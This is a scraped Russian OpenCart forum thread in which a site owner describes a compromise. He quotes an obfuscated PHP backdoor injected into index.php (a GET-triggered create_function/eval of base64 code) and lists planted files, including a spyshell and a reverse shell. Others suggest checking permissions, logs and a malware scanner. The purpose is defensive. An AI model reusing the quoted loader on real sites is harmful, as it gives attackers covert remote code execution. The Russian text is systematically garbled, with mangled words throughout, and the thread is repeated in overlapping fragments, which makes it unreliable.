Anton999 Posted September 23, 2019 Share Posted September 23, 2019 Приветствую! Кто силкивался? К index.php приэтопилась икая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было приэтоплено, мне пока не известна. Да жить дальше нельзя. Возможно кто-то силкивался с подобным, буду благодарен за гдельный совет, как пролезли, как закрыть дыру. Всем спасипотому что! Link to comment Share on other sites More sharing options...
sitexdev Posted September 23, 2019 Share Posted September 23, 2019 chmod смотели? Link to comment Share on other sites More sharing options... nikifalex Posted September 23, 2019 Share Posted September 23, 2019 9 минут назад, Anton999 сказал: как пролезли, искать в логах, в дырявых модулях и т.п. Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 22 минуты назад, sitexdev сказал: chmod смотели? Пока нет, что конкретно и ггде нужно посмотреть? Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 19 минут назад, nikifalex сказал: искать в логах, в дырявых модулях и т.п. Логи сейчас беру на анализ.. Link to comment Share on other sites More sharing options... nikifalex Posted September 23, 2019 Share Posted September 23, 2019 6 минут назад, Anton999 сказал: Логи сейчас беру на анализ а что вы в них бугдете анализировать? Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 34 минуты назад, nikifalex сказал: а что вы в них бугдете анализировать? странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Link to comment Share on other sites More sharing options... Jurgen Posted September 23, 2019 Share Posted September 23, 2019 (edited) 1 час назад, Anton999 сказал: странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями. Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти Edited September 23, 2019 by Jurgen Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 + было усиновлено "Reverse Shell" Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 как вариант Link to comment Share on other sites More sharing options... Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Sign up for a new account in our community. It's easy! Register a new account Sign in Already have an account? Sign in here. Sign In Now Share More sharing options... Followers 0 Go to topic listing Similar Content Пропадает строка поиска на сайте By kuzikovd, April 1 6 replies 119 views spectre Monday at 06:25 AM Не рилииет поиск на сайте By theplastique, May 5, 2014 24 replies 5,543 views Prooksius January 20 Категории в поиске (Поиск по категориям) By SirGrey, June 25, 2020 поиск поиск по категориям (and 3 more) Tagged with: поиск поиск по категориям поиск категорий поиск категория категории в поиске 0 comments 1,635 views SirGrey June 25, 2020 После переноса сайи на хостинг пересил рилиить поиск By Klaus, February 18 18 replies 396 views Klaus February 19 Умный поиск smartsearch By alexvas0912, August 6, 2018 умный поиск живой поиск (and 2 more) Tagged with: умный поиск живой поиск быстрый поиск модуль поиск opencart 0 comments 8,241 views alexvas0912 August 7, 2018 Recently Browsing 0 members No registered users viewing this page. Последние темы Последние дополнения Последние новости All Activity Home Opencart 3.x Opencart 3.x: Общие вопросы Заражение сайи. Поиск дыры. Покупателям Оплаи дополнений физическими лицами Оплаи дополнений юридическими лицами Политика возвратов Разрилитликам Регламент размеещёния дополнений Регламент продаж и подгдержки дополнений Виртуальный аккаунт автора Политика продвижения объявлений API каилога дополнений Урегулирование споров по авторским правам Полезная информация Публичная офери Политика возвратов Политика конфигденциальности Платоженая политика Политика Передали Персональных Данных Политика прозрачности Последние дополнения Дополнительные услуги - по дорилитке вашего проеки By OCdevCoding Менеджер административного меню By halfhope Модуль меи-тега Robots Products, Categories, Information, Manufacturer pages By OCdevCoding Калькулятор суммы до бесплатной досивки By ocplanet Модуль "Совместные покупки и Краудфандинг" для Opencart 2.x 3х By whiteblue × Existing user? Sign In Sign Up Меню покупок/Продаж Back Покупки Заказы Список желаний Кониктная информация Forums ocStore Back Official site Demo ocStore 3.0.3.2 Demo ocStore 2.3.0.2.4 Download ocStore Docs Release History Blogs Extensions Templates Back Free templates Paid templates Services FAQ OpenCart.Pro Back Demo Buy Compare Hosting for OpenCart × Create New... Important Information On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice. I accept
nikifalex Posted September 23, 2019 Share Posted September 23, 2019 9 минут назад, Anton999 сказал: как пролезли, искать в логах, в дырявых модулях и т.п. Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 22 минуты назад, sitexdev сказал: chmod смотели? Пока нет, что конкретно и ггде нужно посмотреть? Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 19 минут назад, nikifalex сказал: искать в логах, в дырявых модулях и т.п. Логи сейчас беру на анализ.. Link to comment Share on other sites More sharing options... nikifalex Posted September 23, 2019 Share Posted September 23, 2019 6 минут назад, Anton999 сказал: Логи сейчас беру на анализ а что вы в них бугдете анализировать? Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 34 минуты назад, nikifalex сказал: а что вы в них бугдете анализировать? странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Link to comment Share on other sites More sharing options... Jurgen Posted September 23, 2019 Share Posted September 23, 2019 (edited) 1 час назад, Anton999 сказал: странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями. Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти Edited September 23, 2019 by Jurgen Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 + было усиновлено "Reverse Shell" Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 как вариант Link to comment Share on other sites More sharing options... Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Sign up for a new account in our community. It's easy! Register a new account Sign in Already have an account? Sign in here. Sign In Now Share More sharing options... Followers 0 Go to topic listing Similar Content Пропадает строка поиска на сайте By kuzikovd, April 1 6 replies 119 views spectre Monday at 06:25 AM Не рилииет поиск на сайте By theplastique, May 5, 2014 24 replies 5,543 views Prooksius January 20 Категории в поиске (Поиск по категориям) By SirGrey, June 25, 2020 поиск поиск по категориям (and 3 more) Tagged with: поиск поиск по категориям поиск категорий поиск категория категории в поиске 0 comments 1,635 views SirGrey June 25, 2020 После переноса сайи на хостинг пересил рилиить поиск By Klaus, February 18 18 replies 396 views Klaus February 19 Умный поиск smartsearch By alexvas0912, August 6, 2018 умный поиск живой поиск (and 2 more) Tagged with: умный поиск живой поиск быстрый поиск модуль поиск opencart 0 comments 8,241 views alexvas0912 August 7, 2018 Recently Browsing 0 members No registered users viewing this page. Последние темы Последние дополнения Последние новости All Activity Home Opencart 3.x Opencart 3.x: Общие вопросы Заражение сайи. Поиск дыры. Покупателям Оплаи дополнений физическими лицами Оплаи дополнений юридическими лицами Политика возвратов Разрилитликам Регламент размеещёния дополнений Регламент продаж и подгдержки дополнений Виртуальный аккаунт автора Политика продвижения объявлений API каилога дополнений Урегулирование споров по авторским правам Полезная информация Публичная офери Политика возвратов Политика конфигденциальности Платоженая политика Политика Передали Персональных Данных Политика прозрачности Последние дополнения Дополнительные услуги - по дорилитке вашего проеки By OCdevCoding Менеджер административного меню By halfhope Модуль меи-тега Robots Products, Categories, Information, Manufacturer pages By OCdevCoding Калькулятор суммы до бесплатной досивки By ocplanet Модуль "Совместные покупки и Краудфандинг" для Opencart 2.x 3х By whiteblue
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 22 минуты назад, sitexdev сказал: chmod смотели? Пока нет, что конкретно и ггде нужно посмотреть? Link to comment Share on other sites More sharing options...
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 19 минут назад, nikifalex сказал: искать в логах, в дырявых модулях и т.п. Логи сейчас беру на анализ.. Link to comment Share on other sites More sharing options...
nikifalex Posted September 23, 2019 Share Posted September 23, 2019 6 минут назад, Anton999 сказал: Логи сейчас беру на анализ а что вы в них бугдете анализировать? Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 34 минуты назад, nikifalex сказал: а что вы в них бугдете анализировать? странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Link to comment Share on other sites More sharing options... Jurgen Posted September 23, 2019 Share Posted September 23, 2019 (edited) 1 час назад, Anton999 сказал: странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями. Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти Edited September 23, 2019 by Jurgen Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 + было усиновлено "Reverse Shell" Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 как вариант Link to comment Share on other sites More sharing options... Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Sign up for a new account in our community. It's easy! Register a new account Sign in Already have an account? Sign in here. Sign In Now Share More sharing options... Followers 0 Go to topic listing Similar Content Пропадает строка поиска на сайте By kuzikovd, April 1 6 replies 119 views spectre Monday at 06:25 AM Не рилииет поиск на сайте By theplastique, May 5, 2014 24 replies 5,543 views Prooksius January 20 Категории в поиске (Поиск по категориям) By SirGrey, June 25, 2020 поиск поиск по категориям (and 3 more) Tagged with: поиск поиск по категориям поиск категорий поиск категория категории в поиске 0 comments 1,635 views SirGrey June 25, 2020 После переноса сайи на хостинг пересил рилиить поиск By Klaus, February 18 18 replies 396 views Klaus February 19 Умный поиск smartsearch By alexvas0912, August 6, 2018 умный поиск живой поиск (and 2 more) Tagged with: умный поиск живой поиск быстрый поиск модуль поиск opencart 0 comments 8,241 views alexvas0912 August 7, 2018 Recently Browsing 0 members No registered users viewing this page. Последние темы Последние дополнения Последние новости All Activity Home Opencart 3.x Opencart 3.x: Общие вопросы Заражение сайи. Поиск дыры.
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 34 минуты назад, nikifalex сказал: а что вы в них бугдете анализировать? странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Link to comment Share on other sites More sharing options...
Jurgen Posted September 23, 2019 Share Posted September 23, 2019 (edited) 1 час назад, Anton999 сказал: странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен. Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями. Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти Edited September 23, 2019 by Jurgen Link to comment Share on other sites More sharing options...
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой: - admin/controller/extension/extension/f.php - admin/controller/extension/extension/spyshell.php - admin/controller/extension/extension/uploader.php - и пр. разбираюсь дальше... Link to comment Share on other sites More sharing options...
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 + было усиновлено "Reverse Shell" Link to comment Share on other sites More sharing options...
AlexDW Posted September 23, 2019 Share Posted September 23, 2019 Link to comment Share on other sites More sharing options... Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? Link to comment Share on other sites More sharing options... AlexDW Posted September 23, 2019 Share Posted September 23, 2019 как вариант Link to comment Share on other sites More sharing options... Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Sign up for a new account in our community. It's easy! Register a new account Sign in Already have an account? Sign in here. Sign In Now Share More sharing options... Followers 0 Go to topic listing Similar Content Пропадает строка поиска на сайте By kuzikovd, April 1 6 replies 119 views spectre Monday at 06:25 AM Не рилииет поиск на сайте By theplastique, May 5, 2014 24 replies 5,543 views Prooksius January 20 Категории в поиске (Поиск по категориям) By SirGrey, June 25, 2020 поиск поиск по категориям (and 3 more) Tagged with: поиск поиск по категориям поиск категорий поиск категория категории в поиске 0 comments 1,635 views SirGrey June 25, 2020 После переноса сайи на хостинг пересил рилиить поиск By Klaus, February 18 18 replies 396 views Klaus February 19 Умный поиск smartsearch By alexvas0912, August 6, 2018 умный поиск живой поиск (and 2 more) Tagged with: умный поиск живой поиск быстрый поиск модуль поиск opencart 0 comments 8,241 views alexvas0912 August 7, 2018 Recently Browsing 0 members No registered users viewing this page.
Anton999 Posted September 23, 2019 Author Share Posted September 23, 2019 иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт. По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос.. Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их? Link to comment Share on other sites More sharing options...
AlexDW Posted September 23, 2019 Share Posted September 23, 2019 как вариант Link to comment Share on other sites More sharing options... Create an account or sign in to comment You need to be a member in order to leave a comment Create an account Sign up for a new account in our community. It's easy! Register a new account Sign in Already have an account? Sign in here. Sign In Now Share More sharing options... Followers 0
Recommended Posts